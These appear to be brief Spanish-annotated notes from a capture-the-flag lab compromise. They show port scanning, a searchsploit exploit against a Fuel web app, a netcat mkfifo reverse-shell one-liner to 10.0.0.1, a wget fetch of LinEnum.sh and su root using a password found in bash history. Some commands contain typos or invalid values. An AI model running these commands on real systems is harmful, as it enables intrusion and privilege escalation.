nmap -A -p- -oA output 172.31.1.28 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.28 -oG allPorts

extractPorts allPorts

nmap -sC -sV -p1880 172.31.1.28 -oN targeted

nmap --script http-enum -p1880 172.31.1.28 -oN webScan

whatweb 172.31.1.28:80

cat targeted

seachsploit Fuel

searchsploit -m 47318.py

Modificamos el archivo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

which python3

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l

No tenemos las credenciales para moira

python3 -m http.server 88888

wget http://10.10.0.12:8888/LinEnum.sh

chmod +x LinEnum.sh

su root

Ponemos la contrasena que se encontro en la historia de bash